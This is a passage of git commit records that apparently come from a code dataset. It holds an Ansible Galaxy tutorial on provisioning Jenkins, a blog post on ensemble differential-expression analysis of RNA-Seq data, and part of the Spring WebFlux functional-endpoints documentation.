\n\nThe mindset here is the same as in #2, but now you may land on the GitHub repository instead of the Ansible Galaxy web site. Hint: it's almost the same thing. Every Ansible Galaxy project has a backing GitHub project. So, guess what? It's open and you can (and should) contribute to it.\n\nNow that we have our role(s), we can move forward and start using them.\n\n=== 4) Read the docs, explore their code\n\nFirst things first. Read all the available documentation on the project you chose and pay attention to the extension points. These are normally variables you should set to get the role to do what you need. Take for example the https:\/\/github.com\/geerlingguy\/ansible-role-java[Geerling Guy's Java role].\n\nIn this role you can set the Java version you want to be installed just by setting the `java_packages` variable.\n\nGo ahead and install the role on your machine:\n\n```\n$ ansible-galaxy install geerlingguy.jenkins\n```\n\nYou need an internet connection so Ansible can connect to the repository and bring in the role and all the dependencies it needs (maven, anyone?). 
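By the way, if you need reproducible installs, `ansible-galaxy` also lets you pin a role to a specific version (the version number below is purely illustrative):\n\n```\n$ ansible-galaxy install geerlingguy.jenkins,3.6.1\n```\n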
After the installation process, check that the role is installed on your system:\n\n```\n$ ansible-galaxy list\n```\n\nYou should see the Jenkins role installed on your system, along with its version and all the other dependencies it needs. Ansible Galaxy works like many other package managers out there: it downloads all the other required dependencies so you can work with it without any worries. Remember the Ansible roles path set in step #2? List that directory and you'll see all the roles there too.\n\nExplore the role creator's work by looking at what the role really does. Start by exploring `$ANSIBLE_ROLES_PATH\/roles\/geerlingguy.jenkins\/tasks\/main.yml`. Normally this is the starting point of the role, where you can really see what's going on. Try to understand the code and how things are being done there. It's a very nice exercise to learn by example and to absorb concepts that are harder to get from books or manuals.\n\nAfter that, get comfortable with the code and explore everything else, trying to understand how the pieces work together to make the role that awesome.\n\n=== 5) Test it\n\nIt's time to enter the arena and put some bytes to work for you. You have to create your project, so start small: in a directory, create a tree like this one:\n\n```\n\u251c\u2500\u2500 project.yml\n\u251c\u2500\u2500 group_vars\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 all.yml\n\u251c\u2500\u2500 inventory.ini\n\u251c\u2500\u2500 meta\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 main.yml\n\u251c\u2500\u2500 requirements.yml\n```\n\nLet's describe them one by one:\n\n1 - `project.yml`: this will be the starting point of your project, so rename it as you please. To start using the role we've just installed, open the file and put this in it:\n\n```\n- name: Deploy Jenkins CI\n hosts: jenkins_server\n remote_user: the_user\n become: yes\n\n roles:\n - geerlingguy.jenkins\n```\n\nWe are creating a play that just runs the role, giving it a name and defining the host and the user who will run the process on the target machine. Please note that it is beyond the scope of this post to create the container or virtual machine where Ansible will run. I suggest https:\/\/www.ansible.com\/docker[Docker] or https:\/\/www.vagrantup.com\/docs\/provisioning\/ansible.html[Vagrant] to do so.\n\n2 - `inventory.ini` is the file that lists the machines Ansible will provision. Read more about it http:\/\/docs.ansible.com\/ansible\/latest\/intro_inventory.html[here]. Remember that the `hosts` property described in #1 should match a host group defined in this file, for example:\n\n```\n[jenkins_server]\n192.168.0.32\n```\n\n3 - `group_vars\/all.yml`. Remember the \"role's extension points\" I mentioned in step #4? This file contains all the variables that we need to set to configure the role to do what we want. So, go ahead and define the Java version for Jenkins:\n\n```\njava_packages:\n - java-1.8.0-openjdk\n```\n\nThis variable is defined in the `geerlingguy.java` role, which is a dependency of `geerlingguy.jenkins`. Isn't it cool how roles can stick together to do great things?\n\n4 - `meta\/main.yml`. In this file we list all the role dependencies we need:\n\n```\ndependencies:\n - geerlingguy.jenkins\n```\n\nThis way we tell Ansible that we need this role to perform our tasks.\n\n5 - `requirements.yml`. 
Despite the name, this isn't a required file for your project, but it's very handy because we can list all the Ansible Galaxy roles that we need and download them with just one command:\n\n```\n$ ansible-galaxy install -r requirements.yml\n```\n\nGo ahead and start provisioning. Your Jenkins server should be provisioned in your environment and you can start creating CI\/CD jobs.\n\n=== The Bottom Line\n\nNow it's time to shine. Gather every role you can find that you are going to use in your project and start chaining them together for awesomeness. In a short time you'll be creating your own roles, contributing to the ones already in the community and doing a great job on your own playbooks. Just to help you out, take a look https:\/\/bitbucket.org\/tecnobizz\/vagrant-alm[at this project] that I did to provision all three servers for the ALM process I was talking about at the beginning of this post. There I orchestrate a simple playbook to create all three machines using just three tasks: provision Jenkins, SonarSource and Nexus.\n\nSee you next time.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"5138403ec57defb32e69faa6d4970dac53c910df","subject":"Update 2016-09-12-Ensemble-analysis-of-Differential-Expression-from-RNA-Seq-data-sets.adoc","message":"Update 2016-09-12-Ensemble-analysis-of-Differential-Expression-from-RNA-Seq-data-sets.adoc","repos":"jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io","old_file":"_posts\/2016-09-12-Ensemble-analysis-of-Differential-Expression-from-RNA-Seq-data-sets.adoc","new_file":"_posts\/2016-09-12-Ensemble-analysis-of-Differential-Expression-from-RNA-Seq-data-sets.adoc","new_contents":"= Ensemble analysis of Differential Expression from RNA-Seq data sets\n\nRecently I've seen discussions among bioinformaticians about which is 'the best' method for DE analysis of RNA-Seq data. It's a recurring theme, and mostly the answer is 'it depends on context and aims', although there is also evidence that some methods are just better than others.\n\nFor the past couple of years, my answer has been that the best method is 'all of them'. I've come round to thinking that an ensemble of methods probably gives the best result most of the time.\n\nThis isn't really a new problem or a new question. Before RNA-Seq was _de rigueur_ for expression experiments, we noticed that in microarray experiments, the list of DE genes varied depending on the method used to estimate DE. In our projects at the time, the 'best' method for DE analysis was a source of regular debate in project meetings among bioinformaticians, or statisticians, or modellers.\n\nWe came to the conclusion that the most robust approach was to use multiple methods, and to correlate them. For example, in this timeseries analysis http:\/\/www.plantcell.org\/content\/24\/9\/3530.full, we used two different methods for estimating whether genes were DE. We then did a manual (or is that visual?) review of the expression profiles of the anomalous cases where only one of the methods scored the gene as significantly DE. This review led us to a conclusion about which method was more reliable in the edge cases for this particular data set.\n\nFast forward a bit and the same issue is live in RNA-Seq expression analysis. 
You've aligned your reads or analysed your kmer content, and have a score or count for each gene or transcript, and you need to decide which tool to use to estimate DE.\n\nThis Venn diagram from Chen et al, 2015 was recently used to give a nice example of the problem:\n\nimage::http:\/\/static-content.springer.com\/image\/art%3A10.1186%2F1471-2164-16-S7-S14\/MediaObjects\/12864_2015_Article_7208_Fig6_HTML.jpg[]\n\nEach method comes up with a different list of genes that are DE. There is some overlap between methods, but it's not immediately clear which method is 'right' or 'wrong' about which particular genes.\n\nMy answer is to believe all the methods, to some extent, and to take an ensemble of methods as my estimate of DE.\n\n*The problem is how to take an ensemble of DE analysis methods.*\n\nMy insight, and my gut feeling, was that when we take the Venn diagram\/p-value cut-off approach, then we throw away most of the information about DE. We demand that genes are DE or not, but actually, there is a whole spectrum from 'almost definitely not DE at all' to 'almost definitely DE'. The analysis tools even make it easy for us by giving an output of q-values, or FDR values for each gene or transcript, that are essentially a metric of 'DE-ness'.\n\nI decided to combine all these separate metrics into a single, ensemble, metric of DE-ness. Being a fettler at heart, I took the obvious approach.\n\n\tI used each tool to generate a ranked order list of all genes,\n sorted by q-value or FDR.\n\tFor each gene, I calculated its sum of ranks, \n by adding up the ranks each individual method had given the gene.\n\tI sorted the gene list by this rank-sum metric.\n\n\nThis gave me a list of genes, sorted from most likely to be DE, as estimated by all the methods, to least likely. Bingo, I have an ensemble DE metric.\n\nThe only thing that remains is to answer that dreaded biologist question \"So which genes are DE?\". The choice of cut-off in the list.\n\nMy view on cut-offs is you cut your list to meet your needs. \n\nIf you want a strict cut-off, because you are going to spend money on follow-up qPCR experiments, then take a cutoff where all genes above the cut-off are assessed as significant by all methods. If you want a lax cut-off, because you want sensitivity, and you are going to follow up with a cheap bioinformatic method like functional enrichment testing, then choose the cutoff accordingly - cut-off at the point where all genes above the cutoff were found significant by at least one method, or at least two.\n\nThis ensemble approach is flexible and extensible to as many different methods of DE assessment as you can choose. My initial choices might be DESeq2, EdgeR, BaySeq, cuffdiff, and limma-voom, because they all have such different models of what it means to be DE, so are likely to form an interesting ensemble. You might prefer your own or different methods. \n\nI think there is a right answer to \"Which methods should I use in my ensemble?\" and I think it is \"All of them\".\n\nThe point is, all methods tend to have a sweet spot where they are particularly sensitive and\/or specific, so the more methods you use in your ensemble, the more potential you have for a generally good ensemble. \n\n\nIn our first public outing for this method (https:\/\/www.ncbi.nlm.nih.gov\/pmc\/articles\/PMC3915549\/) we used three different methods of DE assessment, and we cutoff at the point where at least two methods classified a gene as significant. 
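To make the rank-sum aggregation concrete, here is a minimal sketch in Python. It is purely illustrative (not code from either paper), and it assumes pandas plus a toy table of q-values:\n\n[source,python]\n----\nimport pandas as pd\n\n# Illustrative q-values per gene from three DE tools (smaller = more likely DE)\nqvals = pd.DataFrame({\n    \"deseq2\": [0.001, 0.20, 0.04, 0.90],\n    \"edger\":  [0.002, 0.15, 0.06, 0.80],\n    \"limma\":  [0.010, 0.30, 0.02, 0.95],\n}, index=[\"geneA\", \"geneB\", \"geneC\", \"geneD\"])\n\n# Rank the genes within each tool, then sum the ranks across tools\nranks = qvals.rank(method=\"average\")\nrank_sum = ranks.sum(axis=1).sort_values()\nprint(rank_sum)  # geneA comes first: most likely DE under the ensemble\n----\n\nThe smaller the rank sum, the higher a gene sits in the ensemble ordering; where you cut the list is then driven by your needs, as discussed above.\n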
Our approach was queried by one of our anonymous reviewers. They asked whether this was an accepted method, and whether we could point to evidence that it would work. We responded with logic, rather than direct evidence. We showed that we were using a number of well-cited accepted methods, and correlating their results for robustness. We also showed that the burgeoning fields of Data Science, and competitive mathematical modelling, were rich with examples of ensemble methods outperforming a single method. Our argument was accepted.\n\n\nThe obvious extension of the approach is to start weighting the methods in the ensemble, either based on prior information about how good they are, or where their sweet spots are, or using an iterative approach based on the data in hand. I might get back to that later.\n\n\nHave you used an ensemble method for estimating differential gene expression? Do you think this is a worthwhile approach?\n\n\n","old_contents":"= Ensemble analysis of Differential Expression from RNA-Seq data sets\n\nRecently I've seen discussions among bioinformatians of which is 'the best' method for DE analysis of RNA-Seq data. It's a recurring theme, and mostly the answer is 'it depends on context and aims' although there is also evidence that some methods are just better than others.\n\nFor the past couple of years, my answer has been that the best method is 'all of them'. I've come round to thinking that an ensemble of methods probably gives the best result most of the time.\n\nThis isn't really a new problem or a new question. Before RNA-Seq was _de rigeur_ for expression experiments, we noticed that in microarray experiments, the list of DE genes varied depending on the method used to estimate DE. In our projects at the time, the 'best' method for DE analysis was a source of regular debate in project meetings among bioinformaticians, or statisticians, or modellers.\n\nWe came to the conclusion that the most robust approach was to use multiple methods, and to correlate them. For example, in this timeseries analysis (www.plantcell.org\/content\/24\/9\/3530.full), we used two different methods for estimating whether genes were DE. We then did a manual (or is that visual?) review of the expression profiles of the anomalous cases where only one of the methods score the gene as significantly DE. This review led us to a conclusion about which method was more reliable in the edge cases for this particular data set.\n\nFast forward a bit and the same issue is live in RNA-Seq expression analysis. You've aligned your reads or analysed your kmer content, and have a score or count for each gene or transcript, and you need to decide which tool to use to estimate DE.\n\nThis Venn diagram from Chen et al, 2015 was recently used to give a nice example of the issue: image::http:\/\/static-content.springer.com\/image\/art%3A10.1186%2F1471-2164-16-S7-S14\/MediaObjects\/12864_2015_Article_7208_Fig6_HTML.jpg[]\n\n\n*The problem is how to take an ensemble of DE analysis methods.*\n\nMy insight, and my gut feeling, was that when we take the Venn diagram\/p-value cut-off approach, then we throw away most of the information about DE. We demand that genes are DE or not, but actually, there is a whole spectrum from 'almost definitely not DE at all' to 'almost definitely DE'. 
The analysis tools even make it easy for us by giving an output of q-values, or FDR values for each gene or transcript, that are essentially a metric of 'DE-ness'.\n\nI decided to combine all these separate metrics into a single, ensemble, metric of DE-ness. Being a fettler at heart, I took the obvious approach.\n\n\tI used each tool to generate a ranked order list of all genes,\n sorted by q-value or FDR.\n\tFor each gene, I calculated its sum of ranks, \n by adding up the ranks each individual method had given the gene.\n\tI sorted the gene list by this rank-sum metric.\n\n\nThis gave me a list of genes, sorted from most likely to be DE, as estimated by all the methods, to least likely. Bingo, I have an ensemble DE metric.\n\nThe only thing that remains is to answer that dreaded biologist question \"So which genes are DE?\". The choice of cut-off in the list.\n\nMy view on cut-offs is you cut your list to meet your needs. \n\nIf you want a strict cut-off, because you are going to spend money on follow-up qPCR experiments, then take a cutoff where all genes above the cut-off are assessed as significant by all methods. If you want a lax cut-off, because you want sensitivity, and you are going to follow up with a cheap bioinformatic method like functional enrichment testing, then choose the cutoff accordingly - cut-off at the point where all genes above the cutoff were found significant by at least one method, or at least two.\n\nThis ensemble approach is flexible and extensible to as many different methods of DE assessment as you can choose. My initial choices might be DESeq2, EdgeR, BaySeq, cuffdiff, and limma-voom, because they all have such different models of what it means to be DE, so are likely to form an interesting ensemble. You might prefer your own or different methods. \n\nI think there is a right answer to \"Which methods should I use in my ensemble?\" and I think it is \"All of them\".\n\nThe point is, all methods tend to have a sweet spot where they are particularly sensitive and\/or specific, so the more methods you use in your ensemble, the more potential you have for a generally good ensemble. \n\n\nIn our first public outing for this method (https:\/\/www.ncbi.nlm.nih.gov\/pmc\/articles\/PMC3915549\/) we used three different methods of DE assessment, and we cutoff at the point where at least two methods classified a gene as significant. Our approach was queried by one of our anonymous reviewers. They asked whether this was an accepted method, and whether we could point to evidence that it would work. We responded with logic, rather than direct evidence. We showed that we were using a number of well-cited accepted methods, and correlating their results for robustness. We also showed that the burgeoning fields of Data Science, and competitive mathematical modelling, were rich with examples of ensemble methods outperforming a single method. Our argument was accepted.\n\n\nThe obvious extension of the approach is to start weighting the methods in the ensemble, either based on prior information about how good they are, or where their sweet spots are, or using an iterative approach based on the data in hand. I might get back to that later.\n\n\nHave you used an ensemble method for estimating differential gene expression? 
Do you think this is a worthwhile approach?\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"d8878e4513abe9d127e78aa0d060b1c23861d71a","subject":"Correct method signature in code example","message":"Correct method signature in code example\n\nCloses gh-1887\n","repos":"spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework","old_file":"src\/docs\/asciidoc\/web\/webflux-functional.adoc","new_file":"src\/docs\/asciidoc\/web\/webflux-functional.adoc","new_contents":"[[webflux-fn]]\n= Functional Endpoints\n\nSpring WebFlux includes a lightweight, functional programming model in which functions\nare used to route and handle requests and contracts are designed for immutability.\nIt is an alternative to the annotated-based programming model but otherwise running on\nthe same <<web-reactive.adoc#webflux-reactive-spring-web>> foundation\n\n\n\n\n[[webflux-fn-overview]]\n== Overview\n\nAn HTTP request is handled with a **`HandlerFunction`** that takes `ServerRequest` and\nreturns `Mono<ServerResponse>`, both of which are immutable contracts that offer JDK-8\nfriendly access to the HTTP request and response. `HandlerFunction` is the equivalent of\nan `@RequestMapping` method in the annotation-based programming model.\n\nRequests are routed to a `HandlerFunction` with a **`RouterFunction`** that takes\n`ServerRequest` and returns `Mono<HandlerFunction>`. When a request is matched to a\nparticular route, the `HandlerFunction` mapped to the route is used. `RouterFunction` is\nthe equivalent of an `@RequestMapping` annotation.\n\n`RouterFunctions.route(RequestPredicate, HandlerFunction)` provides a router function\ndefault implementation that can be used with a number of built-in request predicates.\nFor example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nimport static org.springframework.http.MediaType.APPLICATION_JSON;\nimport static org.springframework.web.reactive.function.server.RequestPredicates.*;\nimport static org.springframework.web.reactive.function.server.RouterFunctions.route;\n\nPersonRepository repository = ...\nPersonHandler handler = new PersonHandler(repository);\n\nRouterFunction<ServerResponse> route =\n\troute(GET(\"\/person\/{id}\").and(accept(APPLICATION_JSON)), handler::getPerson)\n\t\t.andRoute(GET(\"\/person\").and(accept(APPLICATION_JSON)), handler::listPeople)\n\t\t.andRoute(POST(\"\/person\"), handler::createPerson);\n\n\npublic class PersonHandler {\n\n\t\/\/ ...\n\n\tpublic Mono<ServerResponse> listPeople(ServerRequest request) {\n\t\t\/\/ ...\n\t}\n\n\tpublic Mono<ServerResponse> createPerson(ServerRequest request) {\n\t\t\/\/ ...\n\t}\n\n\tpublic Mono<ServerResponse> getPerson(ServerRequest request) {\n\t\t\/\/ ...\n\t}\n}\n----\n\nOne way to run a `RouterFunction` is to turn it into an `HttpHandler` and install it\nthrough one of the built-in <<web-reactive.adoc#webflux-httphandler,server adapters>>:\n\n* `RouterFunctions.toHttpHandler(RouterFunction)`\n* `RouterFunctions.toHttpHandler(RouterFunction, HandlerStrategies)`\n\n\nMost applications will run through the WebFlux Java config, see <<webflux-fn-running>>.\n\n\n\n\n[[webflux-fn-handler-functions]]\n== HandlerFunction\n\n`ServerRequest` and `ServerResponse` are immutable interfaces that offer JDK-8 friendly\naccess to the HTTP request and response 
with\nhttp:\/\/www.reactive-streams.org[Reactive Streams] back pressure against the request\nand response body stream. The request body is represented with a Reactor `Flux` or `Mono`.\nThe response body is represented with any Reactive Streams `Publisher`, including `Flux`\nand `Mono`. For more on that see\n<<web-reactive.adoc#webflux-reactive-libraries,Reactive Libraries>>.\n\n\n\n[[webflux-fn-request]]\n=== ServerRequest\n\n`ServerRequest` provides access to the HTTP method, URI, headers, and query parameters,\nwhile access to the body is provided through the `body` methods.\n\nTo extract the request body to a `Mono<String>`:\n\n Mono<String> string = request.bodyToMono(String.class);\n\nTo extract the body to a `Flux<Person>`, where `Person` objects are decoded from some\nserialized form, such as JSON or XML:\n\n Flux<Person> people = request.bodyToFlux(Person.class);\n\nThe above are shortcuts that use the more general `ServerRequest.body(BodyExtractor)`,\nwhich accepts the `BodyExtractor` functional strategy interface. The utility class\n`BodyExtractors` provides access to a number of instances. For example, the above can\nalso be written as follows:\n\n Mono<String> string = request.body(BodyExtractors.toMono(String.class));\n Flux<Person> people = request.body(BodyExtractors.toFlux(Person.class));\n\nTo access form data:\n\n Mono<MultiValueMap<String, String>> map = request.body(BodyExtractors.toFormData());\n\nTo access multipart data as a map:\n\n Mono<MultiValueMap<String, Part>> map = request.body(BodyExtractors.toMultipartData());\n\nTo access multiparts, one at a time, in streaming fashion:\n\n Flux<Part> parts = request.body(BodyExtractors.toParts());\n\n\n\n[[webflux-fn-response]]\n=== ServerResponse\n\n`ServerResponse` provides access to the HTTP response and, since it is immutable, you use\na builder to create it. The builder can be used to set the response status, to add response\nheaders, or to provide a body. Below is an example with a 200 (OK) response with JSON\ncontent:\n\n Mono<Person> person = ...\n ServerResponse.ok().contentType(MediaType.APPLICATION_JSON).body(person, Person.class);\n\nThis is how to build a 201 (CREATED) response with a `\"Location\"` header, and no body:\n\n URI location = ...\n ServerResponse.created(location).build();\n\n\n\n[[webflux-fn-handler-classes]]\n=== Handler Classes\n\nWe can write a handler function as a lambda. For example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nHandlerFunction<ServerResponse> helloWorld =\n request -> ServerResponse.ok().body(fromObject(\"Hello World\"));\n----\n\nThat is convenient, but in an application we need multiple functions, and it is useful to group\nrelated handler functions together into a handler class (like an `@Controller`). 
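As a quick aside, the `helloWorld` lambda above can be exercised without a running server. This is only a sketch; it assumes the `WebTestClient` from the `spring-test` module is on the classpath:\n\n[source,java,indent=0]\n----\nimport org.springframework.test.web.reactive.server.WebTestClient;\nimport org.springframework.web.reactive.function.server.RouterFunction;\nimport org.springframework.web.reactive.function.server.RouterFunctions;\nimport org.springframework.web.reactive.function.server.ServerResponse;\n\nimport static org.springframework.web.reactive.function.server.RequestPredicates.GET;\n\n\/\/ Route the lambda, then drive it through a test client bound to the router function\nRouterFunction<ServerResponse> route = RouterFunctions.route(GET(\"\/hello-world\"), helloWorld);\nWebTestClient client = WebTestClient.bindToRouterFunction(route).build();\n\nclient.get().uri(\"\/hello-world\").exchange()\n\t.expectStatus().isOk()\n\t.expectBody(String.class).isEqualTo(\"Hello World\");\n----\n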
As an example of such a handler class,\nhere is one that exposes a reactive `Person` repository:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nimport static org.springframework.http.MediaType.APPLICATION_JSON;\nimport static org.springframework.web.reactive.function.server.ServerResponse.ok;\nimport static org.springframework.web.reactive.function.BodyInserters.fromObject;\n\npublic class PersonHandler {\n\n\tprivate final PersonRepository repository;\n\n\tpublic PersonHandler(PersonRepository repository) {\n\t\tthis.repository = repository;\n\t}\n\n\tpublic Mono<ServerResponse> listPeople(ServerRequest request) { \/\/ <1>\n\t\tFlux<Person> people = repository.allPeople();\n\t\treturn ok().contentType(APPLICATION_JSON).body(people, Person.class);\n\t}\n\n\tpublic Mono<ServerResponse> createPerson(ServerRequest request) { \/\/ <2>\n\t\tMono<Person> person = request.bodyToMono(Person.class);\n\t\treturn ok().build(repository.savePerson(person));\n\t}\n\n\tpublic Mono<ServerResponse> getPerson(ServerRequest request) { \/\/ <3>\n\t\tint personId = Integer.valueOf(request.pathVariable(\"id\"));\n\t\treturn repository.getPerson(personId)\n\t\t\t.flatMap(person -> ok().contentType(APPLICATION_JSON).body(fromObject(person)))\n\t\t\t.switchIfEmpty(ServerResponse.notFound().build());\n\t}\n}\n----\n<1> `listPeople` is a handler function that returns all `Person` objects found in the repository as\nJSON.\n<2> `createPerson` is a handler function that stores a new `Person` contained in the request body.\nNote that `PersonRepository.savePerson(Mono<Person>)` returns `Mono<Void>`: an empty Mono that emits\na completion signal when the person has been read from the request and stored. So we use the\n`build(Publisher<Void>)` method to send a response when that completion signal is received, i.e.\nwhen the `Person` has been saved.\n<3> `getPerson` is a handler function that returns a single person, identified via the path\nvariable `id`. We retrieve that `Person` via the repository, and create a JSON response if it is\nfound. If it is not found, we use `switchIfEmpty(Mono<T>)` to return a 404 Not Found response.\n\n\n\n\n[[webflux-fn-router-functions]]\n== RouterFunction\n\n`RouterFunction` is used to route requests to a `HandlerFunction`. Typically, you do not\nwrite router functions yourself, but rather use\n`RouterFunctions.route(RequestPredicate, HandlerFunction)`. If the predicate applies, the\nrequest is routed to the given `HandlerFunction`; otherwise no routing is performed,\nand that translates to a 404 (Not Found) response.\n\n\n\n[[webflux-fn-predicates]]\n=== Predicates\n\nYou can write your own `RequestPredicate`, but the `RequestPredicates` utility class\noffers commonly used implementations, based on the request path, HTTP method, content-type,\nand so on. For example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nRouterFunction<ServerResponse> route =\n\tRouterFunctions.route(RequestPredicates.path(\"\/hello-world\"),\n\trequest -> ServerResponse.ok().body(fromObject(\"Hello World\")));\n----\n\nYou can compose multiple request predicates together via:\n\n* `RequestPredicate.and(RequestPredicate)` -- both must match.\n* `RequestPredicate.or(RequestPredicate)` -- either may match.\n\nMany of the predicates from `RequestPredicates` are composed. For example,\n`RequestPredicates.GET(String)` is composed from `RequestPredicates.method(HttpMethod)`\nand `RequestPredicates.path(String)`. 
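To make that composition explicit, here is a small sketch built only from the predicates just described:\n\n[source,java,indent=0]\n----\nimport org.springframework.http.HttpMethod;\nimport org.springframework.http.MediaType;\nimport org.springframework.web.reactive.function.server.RequestPredicate;\nimport org.springframework.web.reactive.function.server.RequestPredicates;\n\n\/\/ All three conditions must hold: HTTP method, path pattern, and Accept header\nRequestPredicate jsonGetPerson = RequestPredicates.method(HttpMethod.GET)\n\t\t.and(RequestPredicates.path(\"\/person\/{id}\"))\n\t\t.and(RequestPredicates.accept(MediaType.APPLICATION_JSON));\n----\n\nThis is equivalent to the `GET(\"\/person\/{id}\").and(accept(APPLICATION_JSON))` shorthand used in the routes below.\n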
You can compose multiple router functions into one, such that they're evaluated in order,\nand if the first route doesn't match, the second is evaluated. You can declare more\nspecific routes before more general ones.\n\n\n\n[[webflux-fn-routes]]\n=== Routes\n\nYou can compose multiple router functions together via:\n\n* `RouterFunction.and(RouterFunction)`\n* `RouterFunction.andRoute(RequestPredicate, HandlerFunction)` -- shortcut for\n`RouterFunction.and()` with nested `RouterFunctions.route()`.\n\nUsing composed routes and predicates, we can then declare the following routes, referring\nto methods in the `PersonHandler`, shown in <<webflux-fn-handler-classes>>, through\nhttps:\/\/docs.oracle.com\/javase\/tutorial\/java\/javaOO\/methodreferences.html[method references]:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nimport static org.springframework.http.MediaType.APPLICATION_JSON;\nimport static org.springframework.web.reactive.function.server.RequestPredicates.*;\n\nPersonRepository repository = ...\nPersonHandler handler = new PersonHandler(repository);\n\nRouterFunction<ServerResponse> personRoute =\n\troute(GET(\"\/person\/{id}\").and(accept(APPLICATION_JSON)), handler::getPerson)\n\t\t.andRoute(GET(\"\/person\").and(accept(APPLICATION_JSON)), handler::listPeople)\n\t\t.andRoute(POST(\"\/person\"), handler::createPerson);\n----\n\n\n\n\n\n[[webflux-fn-running]]\n== Running a server\n\nHow do you run a router function in an HTTP server? A simple option is to convert a router\nfunction to an `HttpHandler` using one of the following:\n\n* `RouterFunctions.toHttpHandler(RouterFunction)`\n* `RouterFunctions.toHttpHandler(RouterFunction, HandlerStrategies)`\n\nThe returned `HttpHandler` can then be used with a number of server adapters by following\n<<web-reactive.adoc#webflux-httphandler,HttpHandler>> for server-specific instructions.\n\nA more advanced option is to run with a\n<<web-reactive.adoc#webflux-dispatcher-handler,DispatcherHandler>>-based setup through the\n<<web-reactive.adoc#webflux-config>>, which uses Spring configuration to declare the\ncomponents required to process requests. The WebFlux Java config declares the following\ninfrastructure components to support functional endpoints:\n\n* `RouterFunctionMapping` -- detects one or more `RouterFunction<?>` beans in the Spring\nconfiguration, combines them via `RouterFunction.andOther`, and routes requests to the\nresulting composed `RouterFunction`.\n* `HandlerFunctionAdapter` -- simple adapter that allows the `DispatcherHandler` to invoke\na `HandlerFunction` that was mapped to a request.\n* `ServerResponseResultHandler` -- handles the result from the invocation of a\n`HandlerFunction` by invoking the `writeTo` method of the `ServerResponse`.\n\nThe above components allow functional endpoints to fit within the `DispatcherHandler` request\nprocessing lifecycle, and also potentially run side by side with annotated controllers, if\nany are declared. 
It is also how functional endpoints are enabled the Spring Boot WebFlux\nstarter.\n\nBelow is example WebFlux Java config (see\n<<web-reactive.adoc#webflux-dispatcher-handler,DispatcherHandler>> for how to run):\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n@Configuration\n@EnableWebFlux\npublic class WebConfig implements WebFluxConfigurer {\n\n\t@Bean\n\tpublic RouterFunction<?> routerFunctionA() {\n\t\t\/\/ ...\n\t}\n\n\t@Bean\n\tpublic RouterFunction<?> routerFunctionB() {\n\t\t\/\/ ...\n\t}\n\n\t\/\/ ...\n\n\t@Override\n\tpublic void configureHttpMessageCodecs(ServerCodecConfigurer configurer) {\n\t\t\/\/ configure message conversion...\n\t}\n\n\t@Override\n\tpublic void addCorsMappings(CorsRegistry registry) {\n\t\t\/\/ configure CORS...\n\t}\n\n\t@Override\n\tpublic void configureViewResolvers(ViewResolverRegistry registry) {\n\t\t\/\/ configure view resolution for HTML rendering...\n\t}\n}\n----\n\n\n\n\n[[webflux-fn-handler-filter-function]]\n== HandlerFilterFunction\n\nRoutes mapped by a router function can be filtered by calling\n`RouterFunction.filter(HandlerFilterFunction)`, where `HandlerFilterFunction` is essentially a\nfunction that takes a `ServerRequest` and `HandlerFunction`, and returns a `ServerResponse`.\nThe handler function parameter represents the next element in the chain: this is typically the\n`HandlerFunction` that is routed to, but can also be another `FilterFunction` if multiple filters\nare applied.\nWith annotations, similar functionality can be achieved using `@ControllerAdvice` and\/or a `ServletFilter`.\nLet's add a simple security filter to our route, assuming that we have a `SecurityManager` that\ncan determine whether a particular path is allowed:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nimport static org.springframework.http.HttpStatus.UNAUTHORIZED;\n\nSecurityManager securityManager = ...\nRouterFunction<ServerResponse> route = ...\n\nRouterFunction<ServerResponse> filteredRoute =\n\troute.filter((request, next) -> {\n\t\tif (securityManager.allowAccessTo(request.path())) {\n\t\t\treturn next.handle(request);\n\t\t}\n\t\telse {\n\t\t\treturn ServerResponse.status(UNAUTHORIZED).build();\n\t\t}\n });\n----\n\nYou can see in this example that invoking the `next.handle(ServerRequest)` is optional: we only\nallow the handler function to be executed when access is allowed.\n\n[NOTE]\n====\nCORS support for functional endpoints is provided via a dedicated <<webflux-cors-webfilter,`CorsWebFilter`>>.\n====\n","old_contents":"[[webflux-fn]]\n= Functional Endpoints\n\nSpring WebFlux includes a lightweight, functional programming model in which functions\nare used to route and handle requests and contracts are designed for immutability.\nIt is an alternative to the annotated-based programming model but otherwise running on\nthe same <<web-reactive.adoc#webflux-reactive-spring-web>> foundation\n\n\n\n\n[[webflux-fn-overview]]\n== Overview\n\nAn HTTP request is handled with a **`HandlerFunction`** that takes `ServerRequest` and\nreturns `Mono<ServerResponse>`, both of which are immutable contracts that offer JDK-8\nfriendly access to the HTTP request and response. `HandlerFunction` is the equivalent of\nan `@RequestMapping` method in the annotation-based programming model.\n\nRequests are routed to a `HandlerFunction` with a **`RouterFunction`** that takes\n`ServerRequest` and returns `Mono<HandlerFunction>`. When a request is matched to a\nparticular route, the `HandlerFunction` mapped to the route is used. 
